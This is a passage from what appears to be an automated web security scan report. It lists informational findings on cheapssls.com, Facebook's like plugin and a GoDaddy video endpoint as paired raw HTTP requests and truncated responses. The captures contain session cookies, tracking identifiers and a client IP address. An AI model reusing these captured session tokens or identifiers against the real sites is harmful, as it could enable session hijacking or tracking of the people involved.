       document.documentElement.firstChild.appendChild(ga);
   })();
//]]>
</script>


<script type="text/javascript">
var sgJsProtocol = (("https:" == document.location.protocol) ? "https://" : "http://");
document.write(unescape("%3Cscript src='" + sgJsProtocol + "dc.skyglue.com/sgtracker.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">try{sgtracker.setSgAccount("dzrauyxi");}catch(err){}</script>

<script type="text/javascript">
var uservoiceOptions = {
key: 'cheapssls',
host: 'cheapssls.uservoice.com',
forum: '103583',
alignment: 'left',
background_color:'#1d1deb',
text_color: 'white',
hover_color: '#f50a1d',
lang: 'en',
showTab: true
};
function _loadUserVoice() {
var s = document.createElement('script');
s.src = ("https:" == document.location.protocol ? "https://" :
"http://") + "cdn.uservoice.com/javascripts/widgets/tab.js";
document.getElementsByTagName('head')[0].appendChild(s);
}
_loadSuper = window.onload;
window.onload = (typeof window.onload != 'function') ? _loadUserVoice
: function() { _loadSuper(); _loadUserVoice(); };
</script>

<script type="text/javascript">
adroll_adv_id = "TL4HVZJAKBDONOOUY7KOKV";
adroll_pix_id = "GBRCJV675BABRAPIIGSPD6";
(function () {
var oldonload = window.onload;
window.onload = function(){
__adroll_loaded=true;
var scr = document.createElement("script");
var host = ((
...[SNIP]...

Request 2

GET /?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A4%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A4%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A4; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.12.9.1315085480977; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:42:36 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:42:36 GMT
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Advanced s
...[SNIP]...
%26x%3D0%26y%3D0%26dispatch%3Dproducts.search&ve%5Btitle%5D=Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big+-+Advanced+search+%3A%3A+Search+results&ve%5Breferrer%5D=&ve%5Btime_begin%5D=1315086156.2414" width="0" height="0"></object>
</noscript>
<script type="text/javascript">
//<![CDATA[
   var _gaq = _gaq || [];
   _gaq.push(["_setAccount", "UA-20441656-1"]);
   _gaq.push(["_trackPageview"]);

   (function() {
       var ga = document.createElement("script");
       ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";
       ga.setAttribute("async", "true");
       document.documentElement.firstChild.appendChild(ga);
   })();
//]]>
</script>


<script type="text/javascript">
var sgJsProtocol = (("https:" == document.location.protocol) ? "https://" : "http://");
document.write(unescape("%3Cscript src='" + sgJsProtocol + "dc.skyglue.com/sgtracker.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">try{sgtracker.setSgAccount("dzrauyxi");}catch(err){}</script>

<script type="text/javascript">
var uservoiceOptions = {
key: 'cheapssls',
host: 'cheapssls.uservoice.com',
forum: '103583',
alignment: 'left',
background_color:'#1d1deb',
text_color: 'white',
hover_color: '#f50a1d',
lang: 'en',
showTab: true
};
function _loadUserVoice() {
var s = document.createElement('script');
s.src = ("https:" == document.location.protocol ? "https://" :
"http://") + "cdn.uservoice.com/javascripts/widgets/tab.js";
document.getElementsByTagName('head')[0].appendChild(s);
}
_loadSuper = window.onload;
window.onload = (typeof window.onload != 'function') ? _loadUserVoice
: function() { _loadSuper(); _loadUserVoice(); };
</script>

<script type="text/javascript">
adroll_adv_id = "TL4HVZJAKBDONOOUY7KOKV";
adroll_pix_id = "GBRCJV675BABRAPIIGSPD6";
(function () {
var oldonload = window.onload;
window.onload = function(){
__adroll_loaded=true;
var scr = document.createElement("script");
var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adrol
...[SNIP]...

14.5. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/comodo-ssl-certificates/premiumssl.html

Request 1

GET /comodo-ssl-certificates/premiumssl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:37:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:37:20 GMT
Content-Length: 50604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>PremiumSSL
...[SNIP]...
<img id="verification_image_send_to_friend" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=cf6iipd25qiq73h5smppvlho87%3Asend_to_friend&send_to_friend4e629e11ae5f0=" alt="" onclick="this.src += 'reload' ;" width="100" height="25" />
   </p>

<div class="buttons-container">



   <span class="button-submit"><input type="submit" name="dispatch[send_to_friend.send]" value="Send" /></span>

</div>

</form>
</div>

           </div>

           <div id="content_block_discussion" class="wysiwyg-content hidden">
                               <div id="content_discussion">

<p class="no-items">No posts found</p>

<h2 class="subheader">

   New post
</h2>
<form action="/" method="post" name="add_post_form">
<input type ="hidden" name="post_data[thread_id]" value="6" />
<input type ="hidden" name="redirect_url" value="index.php?dispatch=products.view&product_id=9" />
<input type="hidden" name="selected_section" value="" />

<div class="form-field">
   <label for="dsc_name" class="cm-required">Your name:</label>
   <input type="text" id="dsc_name" name="post_data[name]" value="" size="50" class="input-text" />
</div>

<div class="form-field">
   <label for="dsc_rating" class="cm-required">Your rating:</label>
   <select id="dsc_rating" name="post_data[rating_value]">
       <option value="5" selected="selected">Excellent!</option>
       <option value="4" >Very Good</option>
       <option value="3" >Average</option>
       <option value="2" >Fair</option>
       <option value="1" >Poor</option>
   </select>
</div>

<div class="form-field">
   <label for="dsc_message" class="cm-required">Your message:</label>
   <textarea id="dsc_message" name="post_data[message]" class="input-textarea" rows="5" cols="72"></textarea>
</div>



   <p>Type the characters you see in the picture below.</p>

   <p><input class="captcha-input-text valign" type="text" name="verification_answer" value= "" autocomplete="off" />
           <img id="verification_image_discussion" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=cf6iipd25qiq73h5smppvlho87%3Adiscussion&discussion4e629e11
...[SNIP]...

Request 2

GET /comodo-ssl-certificates/premiumssl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:38:57 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:38:58 GMT
Content-Length: 50253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>PremiumSSL
...[SNIP]...
<img id="verification_image_send_to_friend" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=jqe9vp2g52pcjv6kf8a4c0jrc4%3Asend_to_friend&send_to_friend4e629e72c2566=" alt="" onclick="this.src += 'reload' ;" width="100" height="25" />
   </p>

<div class="buttons-container">



   <span class="button-submit"><input type="submit" name="dispatch[send_to_friend.send]" value="Send" /></span>

</div>

</form>
</div>

           </div>

           <div id="content_block_discussion" class="wysiwyg-content hidden">
                               <div id="content_discussion">

<p class="no-items">No posts found</p>

<h2 class="subheader">

   New post
</h2>
<form action="/" method="post" name="add_post_form">
<input type ="hidden" name="post_data[thread_id]" value="6" />
<input type ="hidden" name="redirect_url" value="index.php?dispatch=products.view&product_id=9" />
<input type="hidden" name="selected_section" value="" />

<div class="form-field">
   <label for="dsc_name" class="cm-required">Your name:</label>
   <input type="text" id="dsc_name" name="post_data[name]" value="" size="50" class="input-text" />
</div>

<div class="form-field">
   <label for="dsc_rating" class="cm-required">Your rating:</label>
   <select id="dsc_rating" name="post_data[rating_value]">
       <option value="5" selected="selected">Excellent!</option>
       <option value="4" >Very Good</option>
       <option value="3" >Average</option>
       <option value="2" >Fair</option>
       <option value="1" >Poor</option>
   </select>
</div>

<div class="form-field">
   <label for="dsc_message" class="cm-required">Your message:</label>
   <textarea id="dsc_message" name="post_data[message]" class="input-textarea" rows="5" cols="72"></textarea>
</div>



   <p>Type the characters you see in the picture below.</p>

   <p><input class="captcha-input-text valign" type="text" name="verification_answer" value= "" autocomplete="off" />
           <img id="verification_image_discussion" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=jqe9vp2g52pcjv6kf8a4c0jrc4%3Adiscussion&discussion4e629e72
...[SNIP]...

14.6. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/quickssl.html

Request 1

GET /geotrust-ssl-certificates/quickssl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:37:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:37:20 GMT
Content-Length: 51192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>GeoTrust Q
...[SNIP]...
<img id="verification_image_send_to_friend" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=cf6iipd25qiq73h5smppvlho87%3Asend_to_friend&send_to_friend4e629e11470b2=" alt="" onclick="this.src += 'reload' ;" width="100" height="25" />
   </p>

<div class="buttons-container">



   <span class="button-submit"><input type="submit" name="dispatch[send_to_friend.send]" value="Send" /></span>

</div>

</form>
</div>

           </div>

           <div id="content_block_discussion" class="wysiwyg-content hidden">
                               <div id="content_discussion">

       <div class="pagination-container" id="pagination_contents_comments_5">




   <div class="posts" id="post_46">
   <div class="clear">
               <div class="float-left">

<p class="nowrap stars">
<a onclick="$('#block_discussion').click(); return false;"><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_empty.gif" width="13" height="12" alt="" /></a></p>        </div>
               <div class="float-right">
           <em>06/28/2011, 05:18</em>
       </div>
   </div>

   <p class="post-message">"The activation was painful a bit. GeoTrust refused to re-issue domain.com QuickSSL for www.domain.com. The cancellation procedure took a few days. Thanks to support team for timely responses and actions though.<br />
"</p>    <p class="post-author">– Virgil Frazier</p>
</div>
<div class="posts manage-post" id="post_35">
   <div class="clear">
               <div class="float-left">

<p class="nowrap stars">
<a onclick="$('#block_discussion').click(); return false;"><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic
...[SNIP]...

Request 2

GET /geotrust-ssl-certificates/quickssl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:38:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:38:37 GMT
Content-Length: 50841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>GeoTrust Q
...[SNIP]...
<img id="verification_image_send_to_friend" class="image-captcha valign" src="/index.php?dispatch=image.captcha&verification_id=e8rgj1kt8m20dgi3dnp98f1fl5%3Asend_to_friend&send_to_friend4e629e5e5bbdd=" alt="" onclick="this.src += 'reload' ;" width="100" height="25" />
   </p>

<div class="buttons-container">



   <span class="button-submit"><input type="submit" name="dispatch[send_to_friend.send]" value="Send" /></span>

</div>

</form>
</div>

           </div>

           <div id="content_block_discussion" class="wysiwyg-content hidden">
                               <div id="content_discussion">

       <div class="pagination-container" id="pagination_contents_comments_5">




   <div class="posts" id="post_46">
   <div class="clear">
               <div class="float-left">

<p class="nowrap stars">
<a onclick="$('#block_discussion').click(); return false;"><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_empty.gif" width="13" height="12" alt="" /></a></p>        </div>
               <div class="float-right">
           <em>06/28/2011, 05:18</em>
       </div>
   </div>

   <p class="post-message">"The activation was painful a bit. GeoTrust refused to re-issue domain.com QuickSSL for www.domain.com. The cancellation procedure took a few days. Thanks to support team for timely responses and actions though.<br />
"</p>    <p class="post-author">– Virgil Frazier</p>
</div>
<div class="posts manage-post" id="post_35">
   <div class="clear">
               <div class="float-left">

<p class="nowrap stars">
<a onclick="$('#block_discussion').click(); return false;"><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic/customer/images/icons/star_full.gif" width="13" height="12" alt="*" /><img src="/skins/basic
...[SNIP]...

14.7. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http://microsoftcambridge.com&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.223.39
X-Cnection: close
Date: Sat, 03 Sep 2011 13:08:09 GMT
Content-Length: 23271

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e6226b9d9aee3936452386" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">143</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">142</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"60be270b",fb_dtsg:"AQBIq7Rh",no_cookies:1,lhsh:"eAQCRTcBu"};
</script>
<script>

onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/microsoftcambridge.com\/","pageId":null,"widgetID":"connect_widget_4e6226b9d9aee3936452386","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0,"socialbar":false,"ref":null,"userOptedOut":false,"
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://microsoftcambridge.com&layout=button_count&show_faces=false&width=80&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.228.42
X-Cnection: close
Date: Sat, 03 Sep 2011 13:08:16 GMT
Content-Length: 23228

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e6226c08235b4f57441923" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">143</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">142</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"3a33bc43",fb_dtsg:"AQBIq7Rh",no_cookies:1,lhsh:"yAQC2zfPP"};
</script>
<script>

onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/microsoftcambridge.com\/","pageId":null,"widgetID":"connect_widget_4e6226c08235b4f57441923","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0,"socialbar":false,"ref":null,"userOptedOut":false,"
...[SNIP]...

14.8. http://www.godaddy.com/shared/video/videos.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.godaddy.com
Path:	/shared/video/videos.aspx

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:17 GMT
Content-Length: 27411

popUpFill({"Html":"\r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/script/sales_tabs12.min.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\r\n \r\n\r\n \u003ctable id=\"video_trigger\" ce
...[SNIP]...
03e\u003c/tr\u003e\u003c/table\u003e\r\n\r\n\u003cimg src=\"http://img.godaddy.com/image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB101&shopper=46215684&privatelabelid=1&isc=%22&status=200&rand=0.760315277502087&page=%2fshared%2fvideo%2fvideos.aspx&referrer=http%3a%2f%2fwww.godaddy.com%2faffiliates%2faffiliate-program.aspx&ci=22398&split=24&querystring=ci%3d22398%26show_vid%3daffiliatesproductoverview%26pagetype%3daffiliate%26callback%3dpopUpFill%26targetDivId%3dquickTourDiv%26popUpFill%3djsonp1315095995209%26_%3d1315096014458%2526hpGoogleStatic%253d1\" alt=\"\" class=\"traffic\" /\u003e\r\n","TargetDivID":"quickTourDiv","Data":null})

Request 2

GET /shared/video/videos.aspx?ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
